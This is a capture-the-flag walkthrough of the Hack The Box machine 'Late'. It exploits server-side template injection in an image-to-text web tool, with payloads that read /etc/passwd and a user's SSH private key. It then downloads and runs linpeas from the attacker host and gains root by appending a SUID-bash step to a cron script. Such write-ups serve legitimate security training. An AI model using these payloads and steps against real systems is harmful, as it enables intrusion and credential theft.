Summary
Late is Linux machine and
considered as easy box by the hack the box. On this box we will begin with
basic port scan and move laterally based on findings. Then we will enumerate HTTP
service and hunt vulnerabilities present in the web page. Laterally, we will exploit server-side
template injection (SSTI) vulnerability to gain an initial foothold into the
target system. Then we will be tasked to gain root access where we will exploit
it by abusing file ownership and cron
job.
Table of content
Initial Access
- Nmap TCP Port Scan
- Web Page Enumeration
- Vulnerability Assessment
- Server-Side Template Injection Exploitation
- User Flag
Privilege Escalation
- Find Privilege Escalation Vectors
- Escalate Privilege via owned file set to cron job
- Root Flag
Let’s exploit it step by step.
We are going to start assessment with the normal
TCP/IP port scanning.
Nmap TCP Port Scan
We begin with the port scan where we are using nmap
to find out which ports are open and what services are running in the target
host. Nmap is a popular port scanning tool come with Kali Linux. To perform
port scan, we have used -sV flag which performs a service version
against the target machine.
-sV
: Attempts to determine the
service version
nmap -sV 10.129.227.134
From the nmap scan, we have
found there were only two ports open, which is port 22 and port 80.
As usual HTTP service is running on port 80 and SSH service is
running on port 22. HTTP service is used
for the webhosting where SSH service is used for remote connection. We did not
find any vulnerabilities on SSH version 7.6p1 and the possible attack we can
perform against the SSH service at this stage is bruteforce only which we might
not need to. Instead of thinking about the SSH bruteforce let’s start
enumerating port 80.
Web Page Enumeration
We enumerate port 80 and
accessing it over the bowser shown an Image related website. Nothing looks
interesting here in the web page, we saw a heading “Worlds Simplest Image
Utilities” that works for graphics and title “late” which can be a
potential domain name.
Then we checked source code
of the web page as many times we find sensitive information in the comment
section and URLs. There we found a domain name http://images.late.htb/.
Next, we
added the domain name into the /etc/hosts file in our attacking machine to
enumerate further about Domain. You can use any text editor to add domain to
hosts file.
Vulnerability Assessment
After
adding it into the hosts file, we accessed http://image.late.htb over
browser and we got a new web page where we can upload images. After analysing
the functionalities of the web page, we found that web page converts any image
into text format. For example, if we have any text on image then it will
convert it to text format.
Then we decided
to check how it functions and also created a Server-Side Template Injection
(SSTI) payload and saved it as payload.png which makes sense as it converts
images to text. We can write a payload using text editor and take a screenshot
and save it as png format as well.
{{7*7}}
After
creating our payload, we uploaded it into the web page. You can click on browse
tab and upload it from the directory you have kept our payload.png file. We can
see Convertio CMS is being used to convert image file to text files. Convertio
is popular open-sourced image to text convertor.
Once we
convert our file, we can download it by clicking on download tab and it will be
saved as results.txt in our download’s directory. After downloading the
file, we checked the result and found that Convertio is vulnerable to
Server-Side Template Injection (SSTI). If we get the sum of the given argument,
then it is quite promising that server is vulnerable to SSTI. For example, we
have given {{7*7}}in our payload and received 49 as sum of 7*7.
A
server-side template injection (SSTI) vulnerability occurs when user
data is embedded directly in a template and then interpreted by the template
engine. This allows attackers to inject arbitrary directives to manipulate
the template engine.
Then we
decided to check the users in the target system. The user file is available in
the /etc/passwd file. SSTI works similar as Local File inclusion vulnerability,
but it has different syntax which is available here:
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection
We created
a new payload to read /etc/passwd file from the target system and repeated the
same process.
{{
get_flashed_messages.__globals__.__builtins__.open("/etc/passwd").read()
}}
Then we
uploaded it and converted it to text format as we did earlier.
This time we got /etc/passwd file contents of
the target system. After having a closer look into the passwd file, we found a
user svc_acc present there. Now, we can perform couple of attacks
against the target such as SSH service bruteforce or retrieving id_rsa file
from the target host. When SSH bruteforce failed, we decided to retrieve the
id_rsa file from the user .ssh directory.
Server-Side Template
Injection (SSTI) Exploitation
The id_rsa
file is in the /home/svc_acc/.ssh directory named as id_rsa. With id_rsa
private key we can log in as svc_acc user without password if the id_rsa key is
not protected with password. Then we created another payload where we have
given the file path of the id_rsa and saved it as payload.png.
{{
get_flashed_messages.__globals__.__builtins__.open("/home/svc_acc/.ssh/id_rsa").read()
}}
When we
upload our new payload, it will read the contents of id_rsa key and save it as
results.txt file. We retrieved the RSA key downloading converted file. Now, we
have RSA key, so we are in the position try log in via SSH service with retrieved
RSA key.
User Flag
We saved
RSA key as key and given 600 file permission. RSA key works with 600 and
400 file permission. If we do not give permission, then it will throw some
errors to establish connection with the remote host. 600 permissions means that only the owner of the file
has full read and write access to it. Once a file permission is set to 600,
no one else can access the file. We can give permission to file by chmod 600
<filename>.
chmod 600 key
Then we can log in to the target system using RSA key as
svc_acc. As we are going to establishing connection to the target host, we must
add -i and pass RSA key to authenticate.
ssh -i key svc_acc@10.129.227.134
After logging in to the target system we can grab user flag
from the svc_acc home directory.
cat user.txt
Next, we need to escalate to privilege account, so we transferred
linpeas.sh script to the target system /tmp directory as any user has full
permission on this directory. To transfer linpeas.sh into the target system we
have to setup a python server in kali machine. Here we have set up python
server on port 80, now we can download script with wget from target side.
In Kali:
python3 -m http.server 80
On Target:
wget
10.10.14.31/linpeas.sh
Once it is
downloaded in the target system, we will give full permission to the linpeas.sh
and execute it. Script will enumerate possible privilege escalation vectors
present in the target system.
chmod 777 linpeas.sh
./linpeas.sh
Privilege
escalation is the process of exploiting a bug, design flaw or configuration
oversight in an operating system or software application to gain elevated
access to resources that are normally protected from an application or user.
Privilege escalation can be used by attackers to gain access to more system
functions and data than intended by the root user. In some cases, privilege
escalation can allow attackers to gain complete control of the system.
Find Privilege Escalation
Vectors
After
reviewing the linpeas.sh output, we found that the current user has an ownership
permission on the ssh-alrert.sh script. We can perform various attacks
if the file is writable by low privileged user and owned by root user. Before
coming into any conclusion, lets enumerate what script does.
Escalate Privilege via owned
file set to cron job
The script
must be running as cron job, that means it is automated to perform some tasks
on events or set for some jobs. For
example, when someone try to log in via SSH then it will send an alert to root
user. We have ownership of the script but unfortunately, we cannot modify it.
Root Flag
Being an
owner of the script, we can append anything on the script, which means we
cannot delete or modify existing contents, but we have privilege to add more in
it. So, if script executed by root next time it will also execute the task we
have added.
Let’s
append /bin/bash binary and give SUID permission. Now if we log in via SSH
service then it will create a bin/bash binary in svc_acc home directory with
SUID set. If we execute it, then it will spawn a root shell. Once we get root
shell then we can grab root flag from /root/root directory.
Conclusion:
This machine was
fun and was great source of learning, where we have learned and explored so
many things such as TCP port scan, service enumeration, Server-Side Template
Injection vulnerability assessment and exploitation, file transfer, file
permissions, cron script analysis and performed privilege escalation by
exploiting file permission and cron job.
Thank you for
giving your precious time to read this walkthrough. I hope you have enjoyed and
learned something new today. Happy Hacking!
0 comments:
Post a Comment